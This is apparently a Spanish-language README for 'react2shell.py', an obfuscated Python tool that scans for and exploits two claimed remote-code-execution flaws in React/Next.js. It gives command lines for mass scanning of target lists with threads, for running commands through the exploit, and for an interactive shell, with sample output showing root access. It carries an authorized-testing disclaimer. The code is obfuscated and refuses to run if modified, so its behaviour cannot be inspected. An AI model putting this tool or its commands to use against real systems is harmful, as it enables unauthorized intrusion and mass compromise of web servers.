
Escanea y explota dos vulnerabilidades de RCE en React/Next.js (CVE-2025-55182, CVE-2025-66478) con ejecución de comandos, shell interactivo y soporte de objetivos masivos.
Autor: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Versión: 2.0.0 (Ofuscado)
Fecha: 2025-12-07
python react2shell.py
¡Eso es todo! El escáner:
[1] Escanear URL Única
[2] Escanear Múltiples URLs desde Archivo
[3] Explotar URL Única
[4] Explotar Múltiples URLs desde Archivo
[5] Shell Interactivo (Modo Explotación)
[6] Ajustes
[7] Ver Resultados Anteriores
[0] Salir
python react2shell.py
# Escanear URL única
python react2shell.py -u https://target.com
# Escanear múltiples URLs
python react2shell.py -f targets.txt
# Explotar con comando
python react2shell.py -u https://target.com --exploit -c "whoami"
# Escaneo masivo con hilos
python react2shell.py -f targets.txt -t 20 -o results.json
Cada vez que ejecutas el escáner, automáticamente:
Si alguien intenta modificar el código ofuscado:
[ERROR] ¡La verificación de integridad del escáner FALLÓ!
[!] El código del escáner ha sido manipulado.
[!] Esta es una herramienta protegida por LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
El escáner se negará a ejecutarse si detecta cualquier manipulación.
Todas las funciones originales están 100% preservadas:
python react2shell.py -u https://example.com
Salida:
=================================================================
Escáner CVE - CVE-2025-55182 & CVE-2025-66478
Autor: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Escaneando: https://example.com
[+] VULNERABLE: https://example.com
Versión: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Seleccione la opción 5
# Ingrese la URL objetivo
Sesión de Shell:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
¡Esta herramienta es SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS!
✅ Tus propias aplicaciones
✅ Pruebas de penetración autorizadas
✅ Programas de bug bounty (dentro del alcance)
✅ Investigación de seguridad (autorizada)
❌ Escaneo no autorizado
❌ Explotación no autorizada
❌ Cualquier actividad ilegal
❌ Violación de términos de servicio
El autor (LAKSHMIKANTHAN K) no se hace responsable del mal uso de esta herramienta. Los usuarios son los únicos responsables de sus acciones y deben cumplir con todas las leyes aplicables.
Causa: El archivo está corrupto
Solución: Descargar una copia nueva
Causa: El archivo ha sido modificado
Solución: Descargar una copia nueva (no modificar el archivo)
Causa: Faltan dependencias
Solución:
pip install requests urllib3
Causa: Sobrecarga de descompresión (mínima)
Nota: Solo ocurre una vez al inicio, luego funciona a máxima velocidad
R: El código está ofuscado y comprimido. Puedes usar la versión original no ofuscada si necesitas leer el código.
R: Impacto mínimo. Hay un pequeño retraso al inicio para la descompresión (~0.1 segundos), luego funciona a máxima velocidad.
R: No. Cualquier modificación romperá la verificación de integridad y el escáner se negará a ejecutarse.
R: La ofuscación no es encriptación. Atacantes decididos aún podrían aplicar ingeniería inversa, pero es muy difícil y consume tiempo.
R: Contacta al autor en Instagram: @letchu_pkt
Nombre: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Si encuentras problemas:
pip install requests urllib3
python react2shell.py
Elige del menú interactivo o usa el modo CLI.
Sigue las indicaciones o proporciona argumentos de línea de comandos.
# Modo interactivo
python react2shell.py
# Escanear URL única
python react2shell.py -u https://target.com
# Escaneo masivo
python react2shell.py -f targets.txt -t 20
# Explotar
python react2shell.py -u https://target.com --exploit -c "whoami"
# Ayuda
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
¡Gracias por usar el Escáner CVE! 🚀
Versión: 2.0.0 (Ofuscado)
Fecha: 2025-12-07
Licencia: Solo para pruebas de seguridad autorizadas